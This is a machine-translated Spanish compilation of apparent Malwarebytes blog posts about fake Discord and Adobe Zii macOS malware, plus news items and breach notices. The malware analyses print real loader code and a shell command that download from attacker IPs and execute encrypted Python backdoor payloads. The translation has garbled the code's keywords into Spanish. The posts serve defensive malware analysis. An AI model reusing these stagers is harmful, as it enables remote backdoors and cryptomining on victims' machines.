o = __ importar __ ({2: 'urllib2', 3: 'urllib.request'} [sys.version_info [0]], fromlist = ['build_opener']). build_opener (); UA = 'Mozilla / 5.0 (Macintosh; Intel Mac OS X 10.11; rv: 45.0) Gecko / 20100101 Firefox / 45.0 '; o.addheaders = [(' User-Agent ', UA)]; a = o.open (' http://37.1.221.204:8080 /index.asp '). read (); key =' 7b3639a4ab39765739a5e0ed75bc8016 '; S, j, out = range (256), 0, []
para i en rango (256):
j = (j + S [i] + ord (clave [i% len (clave)]))% 256
S [i], S [j] = S [j], S [i]
i = j = 0
para char en un:
i = (i + 1)% 256
j = (j + S [i])% 256
S [i], S [j] = S [j], S [i]
out.append (chr (ord (char) ^ S [(S [i] + S [j])% 256]))
exec (''. join (out))
La secuencia de comandos también configura un agente de inicio denominado com.apple.systemkeeper.plist , que mantiene de forma persistente el código de captura de pantalla y el código de puerta trasera EmPyre en ejecución.
Este malware no es realmente convincente, ya que no hace nada en absoluto para pretender que es una aplicación legítima de Discord. No es una copia maliciosamente modificada de la aplicación Discord. Ni siquiera incluye y lanza una copia de la aplicación Discord, que podría hacer fácilmente como un subterfugio para hacer que la aplicación parezca legítima. Para el caso, ¡ni siquiera usa un icono convincente!
En su lugar, el malware utiliza un icono genérico de applet de Automator, y todo lo que sucede cuando se ejecuta es que aparece un icono de engranaje en la barra de menú (como es normal en cualquier secuencia de comandos de Automator).
Por supuesto, cuando el usuario nota que algo está mal, el malware ha configurado el agente de inicio, abrió la puerta trasera y envió algunas capturas de pantalla. Muchos usuarios pueden notar que algo está apagado, pero es posible que no sepan qué hacer al respecto.
Similitudes interesantes
Hay algunas similitudes interesantes entre este malware falso de Discord, que Malwarebytes detecta como OSX.LamePyre , y el malware OSX.DarthMiner descubierto a principios de esta semana. Ambos se distribuyen en forma de applets de Automator, ambos ejecutan scripts de Python y ambos usan una puerta trasera EmPyre.
Sin embargo, también hay algunas diferencias. Los medios para ejecutar el script de Python son diferentes en estos dos casos. Además, el propósito primario aparente para el malware también es diferente: la criptomina, en el caso de DarthMiner, y las capturas de pantalla, en el caso de LamePyre.
Parece probable que estos puedan ser hechos por la misma persona, pero también es posible que uno sea un imitador de la otra.
El malware de macro de Word (que Malwarebytes actualmente detecta como OSX.BadWord , por falta de un nombre oficial) también configura una puerta trasera utilizando Python, y al igual que OSX.DarthMiner, ejecuta el código Python directamente en el agente de lanzamiento, que es algo inusual . Por supuesto, utiliza una puerta trasera diferente y un método de entrega diferente.
Los tres han hecho un uso intensivo del código prestado en forma de puertas traseras de código abierto (EmPyre en dos casos, el módulo Meterpreter de Metasploit en el tercero), así como copiar y pegar el código de vulnerabilidad VBA directamente desde el blog de un investigador.
Dos malware, un creador?
Las similitudes entre todos estos malware, así como la estrecha coincidencia en el tiempo (todos se enviaron por primera vez a VirusTotal en un período de aproximadamente un mes), pueden significar que todos fueron creados por el mismo desarrollador de malware.
Sin embargo, no hay evidencia concreta para esa suposición en este momento. Las direcciones IP con las que se comunican estas piezas de malware están distribuidas por todo el mundo en los EE. UU., Luxemburgo, Alemania y los Países Bajos, y no hay conexiones obvias entre ellas. El código es similar, pero no idéntico.
En este momento, estamos llamando a cada uno de ellos con un nombre diferente, pero seguiremos investigando.
Mientras tanto, las mejores cosas que puede hacer para mantenerse a salvo son:
No permitir que las macros se ejecuten en documentos de Microsoft Office
No descargue software de ningún otro sitio que no sea el sitio oficial del desarrollador, y especialmente no los sitios de piratería
No abra nada que le haya enviado por correo electrónico a menos que conozca al remitente y lo estuviera esperando.
Si abre una aplicación recién descargada y algo no funciona como se esperaba, consulte con el desarrollador
También publicamos el informe «Bajo el radar: el futuro del malware no detectado» , en el que examinamos las amenazas actuales y las tecnologías que no están preparadas para ellas. Puede descargar el informe directamente aquí .
Usuarios de iOS de EE. UU. Apuntados por campaña de publicidad maliciosa masiva. ScamClub, un grupo delictivo en línea poco conocido, secuestró 300 millones de sesiones de navegador para redirigir a los visitantes a sitios de adultos y estafas de tarjetas de regalo a través de códigos maliciosos colocados dentro de los anuncios que sirven. (Fuente: ZDNet)
¿Hacer un pago ransomware? Ahora puede violar las sanciones de Estados Unidos. Los afectados por el ransomware en los EE. UU. Tienen menos posibilidades de recuperar sus datos. El gobierno de EE. UU. Comenzó a penalizar a individuos y organizaciones por pagar a los actores de amenazas de ransomware. (Fuente: Bleeping Computer)
Nuevo giro a la estafa de abuelos: correo efectivo. En un informe, la Comisión Federal de Comercio (FTC, por sus siglas en inglés) advirtió a los usuarios sobre la tendencia creciente de las personas mayores de 70 años o más que se les acusa de enviar dinero a personas que pretenden ser sus nietos. (Fuente: La FTC)
Zoom parches error grave de videoconferencia. Se descubrió que Zoom, una popular herramienta de videoconferencia para empresas, tiene un error que, una vez explotado, puede dar a los atacantes la capacidad de tomar control de las computadoras que participan en una llamada de conferencia. Zoom ya parchó el error. (Fuente: Blog de seguridad desnuda de Sophos)
Los consumidores creen que los sitios de medios sociales representan el mayor riesgo para los datos. Según una encuesta realizada por Gemalto, la mayoría de los usuarios de Internet conscientes de la privacidad creen que los sitios web, en particular los sitios de redes sociales y bancos, no están protegiendo sus datos adecuadamente. Muchos de los encuestados también culpan a las empresas por cualquier violación de datos y es probable que se alejen de ellos y / o actúen en su contra. (Fuente: Help Net Security)
A principios de esta semana, descubrimos una nueva pieza de malware para Mac que combina dos herramientas de código abierto diferentes, la puerta trasera EmPyre y el cryptominer XMRig, con el propósito del mal.
El malware se distribuía a través de una aplicación llamada Adobe Zii. Adobe Zii es un software diseñado para ayudar en la piratería de una variedad de aplicaciones de Adobe. En este caso, sin embargo, la aplicación se llamaba Adobe Zii, pero definitivamente no era la cosa real.
Como se puede ver en las capturas de pantalla anteriores, el software real Adobe Zii, a la izquierda, utiliza el logotipo de Adobe Creative Cloud. (Después de todo, si va a escribir un software para ayudar a las personas a robar el software de Adobe, ¿por qué no robar el logotipo también?) Sin embargo, el instalador de malware utiliza un icono genérico de applet Automator.
Comportamiento
Al abrir la aplicación Adobe Zii falsa con Automator se revela la naturaleza del software, ya que simplemente ejecuta un script de shell:
curl https://ptpb.pw/jj9a | python - & s = 46.226.108.171: 80; curl $ s / sample.zip -o sample.zip; descomprimir sample.zip -d muestra; muestra de cd; cd __MACOSX; abrir -a sample.app
Esta secuencia de comandos está diseñada para descargar y ejecutar una secuencia de comandos de Python, luego descargar y ejecutar una aplicación llamada sample.app.
El sample.app es simple. Parece ser simplemente una versión de Adobe Zii, probablemente con el propósito de hacer que parezca que el malware es realmente «legítimo». (Esto no implica que la piratería de software sea legítima, por supuesto, sino que significa que el malware intentaba parecer que estaba haciendo lo que el usuario pensaba que tenía la intención de hacer.)
¿Qué pasa con el script de Python? Resultó estar ofuscado, pero se pudo desenfocar fácilmente, revelando el siguiente script:
import sys; import re, subprocess; cmd = "ps -ef | grep Little \ Snitch | grep -v grep"
ps = subprocess.Popen (cmd, shell = True, stdout = subprocess.PIPE)
out = ps.stdout.read ()
ps.stdout.close ()
Si re.search ("Little Snitch", fuera):
sys.exit ()
importar urllib2;
UA = 'Mozilla / 5.0 (Windows NT 6.1; WOW64; Trident / 7.0; rv: 11.0) como Gecko'; server = 'http: //46.226.108.171: 4444'; t = '/ news.php'; req = urllib2.Request (servidor + t);
req.add_header ('User-Agent', UA);
req.add_header ('Cookie', "session = SYDFioywtcFbUR5U3EST96SbqVk =");
proxy = urllib2.ProxyHandler ();
o = urllib2.build_opener (proxy);
urllib2.install_opener (o);
a = urllib2.urlopen (req) .read ();
IV = a [0: 4]; datos = a [4:]; clave = IV + '3f239f68a035d40e1891d8b5fdf032d3'; S, j, out = rango (256), 0, []
para i en rango (256):
j = (j + S [i] + ord (clave [i% len (clave)]))% 256
S [i], S [j] = S [j], S [i]
i = j = 0
para los datos de char:
i = (i + 1)% 256
j = (j + S [i])% 256
S [i], S [j] = S [j], S [i]
out.append (chr (ord (char) ^ S [(S [i] + S [j])% 256]))
exec (''. join (out))
Lo primero que hace este script es buscar la presencia de Little Snitch, un cortafuegos saliente de uso común que sería capaz de llamar la atención de los usuarios a la conexión de la red de puerta trasera. Si Little Snitch está presente, el malware se rescata. (Por supuesto, si se instalara un cortafuegos saliente como Little Snitch, ya habría bloqueado la conexión que habría intentado descargar este script, por lo que no vale la pena comprobar en este punto).
Este script abre una conexión a un backend de EmPyre, que es capaz de enviar comandos arbitrarios a la Mac infectada. Una vez que la puerta trasera está abierta, recibe un comando que descarga el siguiente script a /private/tmp/uploadminer.sh y lo ejecuta:
Este script descarga e instala los otros componentes del malware. Se creó un agente de lanzamiento llamado com.proxy.initialize.plist para mantener la puerta trasera abierta de forma persistente ejecutando exactamente el mismo script de Python ofuscado mencionado anteriormente.
El script también descarga el cryptominer XMRig y un archivo de configuración en la carpeta / Users / Shared /, y configura un agente de inicio llamado com.apple.rig.plist para mantener el proceso XMRig en ejecución con esa configuración activa. (El nombre de «com.apple» es una señal de alerta inmediata que fue la causa raíz del descubrimiento de este malware).
Curiosamente, hay un código en esa secuencia de comandos para descargar e instalar un certificado raíz asociado con el software mitmproxy, que es un software capaz de interceptar todo el tráfico web, incluido (con la ayuda del certificado) tráfico «https» cifrado. Sin embargo, ese código fue comentado, lo que indica que no estaba activo.
En la superficie, este malware parece ser bastante inofensivo. Los cryptominers normalmente solo hacen que la computadora se ralentice, gracias a un proceso que absorbe toda la CPU / GPU.
Sin embargo, esto no es sólo un cryptominer. Es importante tener en cuenta que el cryptominer se instaló a través de un comando emitido por la puerta trasera, y es muy posible que haya habido otras órdenes arbitrarias enviadas a Macs infectadas por la puerta trasera en el pasado. Es imposible saber exactamente qué daño podría haber hecho este malware a los sistemas infectados. El hecho de que solo hayamos observado el comportamiento de la minería no significa que nunca haya hecho otras cosas.
Trascendencia
Malwarebytes para Mac detecta este malware como OSX.DarthMiner. Si está infectado, es imposible decir qué otra cosa pudo haber hecho el malware además de criptominar. Es totalmente posible que pueda haber archivos exfiltrados o contraseñas capturadas.
Hay una lección importante que aprender de esto. Se sabe que la piratería de software es una de las actividades más riesgosas que puede realizar en su Mac. El peligro de infección es alto, y esto no es nuevo, sin embargo, las personas aún participan en este comportamiento. Por favor, en el futuro, hágase un favor y no piratee el software. Los costos pueden ser mucho más altos que comprar el software que intenta obtener de forma gratuita.
Como si no lo hayas escuchado lo suficiente, el panorama de amenazas está cambiando. Siempre está cambiando, y por lo general no es para mejor.
El nuevo malware que vemos que se está desarrollando y desplegando en la naturaleza tiene características y técnicas que les permiten ir más allá de lo que originalmente podían hacer, ya sea con el propósito de una infección adicional o la evasión de la detección.
Con ese fin, decidimos echar un vistazo a algunas de estas amenazas y desentrañar lo que hace que sean difíciles de detectar, quedando fuera de la vista y capaces de propagarse en silencio en toda la organización.
Luego examinamos qué tecnologías no están preparadas para estas amenazas, qué tecnología moderna es realmente efectiva contra estas nuevas amenazas y, finalmente, hacia dónde podría conducir la evolución de estas amenazas.
Las amenazas que discutimos:
Emotet
TrickBot
Sorebrect
Sam Sam
PowerShell, como un vector de ataque.
Al analizar estas amenazas, también observamos dónde se encuentran con mayor frecuencia en las regiones de EE. UU., APAC y EMEA.
Detecciones Emotet 2018 en los Estados Unidos.
Al hacerlo, descubrimos tendencias interesantes que crean nuevas preguntas, algunas de las cuales son claras y otras que necesitan más investigación. En cualquier caso, es evidente que estas amenazas no son antiguas, sino que se van haciendo más y más grandes salpicaduras a medida que avanza el año, de formas interesantes y, a veces, inesperadas.
Detecciones de ransomware Sorebrect en la región APAC
Aunque se desconoce la extensión y las capacidades de las amenazas futuras, tenemos que preparar a las personas para proteger sus datos y experiencias en línea. Desafortunadamente, muchas soluciones de seguridad antiguas no podrán combatir amenazas futuras, y mucho menos lo que está disponible ahora.
Sin embargo, no todas son malas noticias en materia de seguridad, ya que tenemos mucho a nuestro favor como en los desarrollos tecnológicos e innovaciones en las características modernas. Por ejemplo:
Detección de comportamiento
Bloqueo en la entrega
Modos de autodefensa
Estas características son efectivas para combatir las amenazas actuales y pronto serán necesarias para construir la base para futuros desarrollos, tales como:
Inteligencia artificial utilizada para desarrollar, distribuir o controlar malware.
El continuo desarrollo de malware sin archivos y «invisible».
Las empresas se están convirtiendo en alimento de gusanos para el futuro malware
Quora es una comunidad en línea que se centra en hacer y responder preguntas. Fue fundada en 2009 por dos ex empleados de Facebook.
Los datos robados pueden referirse a hasta 100 millones de usuarios de la plataforma e incluyen el nombre de usuario, la dirección de correo electrónico y la contraseña cifrada. En algunos casos, los datos importados de otras redes sociales y mensajes privados en la plataforma también se pueden haber tomado.
Para contrarrestar el abuso futuro de las credenciales de inicio de sesión, aconsejamos a los usuarios de Quora que cambien su contraseña y nos aseguremos de que la combinación de credenciales que usaron en Quora no se use en ningún otro lugar. A pesar de que Quora utilizó el cifrado y usó las contraseñas, no es prudente suponer que nadie podrá descifrarlas. Para aquellos que tienen la costumbre de reutilizar contraseñas en diferentes sitios, lea: ¿Por qué no necesita 27 contraseñas diferentes ?
Para aquellos que ya no quieran registrarse en Quora, también le recomendamos que consulte en Configuración y Desconecte todas y cada una de las Cuentas conectadas .
Un actor de amenazas logró obtener acceso a las cuentas de Dunkin ‘Donuts Perks. Las cuentas de Perks son un sistema de recompensa de lealtad de uso común. Dunkin ‘Donuts afirma que no hubo violaciones en sus sistemas, pero que las contraseñas reutilizadas fueron las culpables.
hemos sido informados de que terceros obtuvieron nombres de usuario y contraseñas a través de las brechas de seguridad de otras compañías y utilizaron esta información para iniciar sesión en algunas cuentas Dunkin ‘DD Perks.
Como contramedida, forzaron el restablecimiento de contraseñas para todos los clientes que la compañía cree que se vieron afectados. Si usted es uno de estos clientes, los actores de amenazas podrían haber aprendido su nombre y apellidos, las direcciones de correo electrónico, los números de cuenta de 16 dígitos de DD Perks y los códigos QR de DD Perks.
El puesto de avanzada canadiense del minorista de regalos de flores y alimentos gourmet informó sobre un incidente en el que un actor de amenazas pudo haber obtenido acceso a los datos de clientes de 75,000 pedidos canadienses, incluidos nombres e información de tarjetas de crédito, durante un período de cuatro años. A pesar de que la violación no afectó a ningún cliente en su sitio web de EE. UU., 1-800-Flowers.com, la compañía ha presentado una notificación ante la oficina del fiscal general en California.
La información de pago robada parece incluir números de tarjetas de crédito y toda la información relacionada: nombres, fechas de vencimiento y códigos de seguridad. Eso es realmente todo lo que un criminal experimentado necesita para saquear tu cuenta.
¿Tienes miedo de ser víctima de esta violación? Esto es lo que puedes hacer para evitar daños adicionales:
Revise sus cuentas bancarias y de tarjetas de crédito para detectar actividades sospechosas.
Considere una congelación de crédito si le preocupa que su información financiera haya sido comprometida.
Cuidado con las estafas relacionadas con infracciones; Los cibercriminales saben que esto es una violación masiva y de interés periodístico, por lo que aprovecharán la oportunidad de atrapar a los usuarios a través de la ingeniería social.
Algunas de las brechas recientes ocurrieron hace bastante tiempo o han estado en curso durante años, así que ¿por qué nos lo están diciendo ahora?
Posibles razones:
La nueva legislación obliga a las empresas a denunciar las infracciones.
Las infracciones ocurren todo el tiempo, pero son serias o grandes, por lo que los medios de comunicación hablan de ellas.
Cuando se emite una brecha grande, siempre verás unos pocos más pequeños, intentando esconderte en su sombra.
Si usted es un negocio que busca consejos para evitar ser golpeado por una infracción:
Invierta en un producto de protección de punto final y un programa de prevención de pérdida de datos para asegurarse de que las alertas sobre ataques similares lleguen a su personal de seguridad lo más rápido posible.
Eche un vistazo a su programa de gestión de activos:
¿Tiene un 100 por ciento de contabilidad de todos sus activos externos?
¿Tiene perfiles de usuario uniformes en su negocio para todos los casos de uso?
Cuando se trata de un movimiento lateral después de una brecha inicial, no puedes captar lo que no puedes ver. El primer paso para una mejor postura de seguridad es saber con qué tienes que trabajar.
En un mundo donde parece que las infracciones no pueden ser contenidas, los consumidores y las empresas una vez más tienen que lidiar con las consecuencias. Nuestro consejo a las organizaciones: No te conviertas en un cuento de advertencia. Guarde la molestia de sus clientes y salve la reputación de su empresa tomando medidas proactivas para asegurar su empresa hoy.
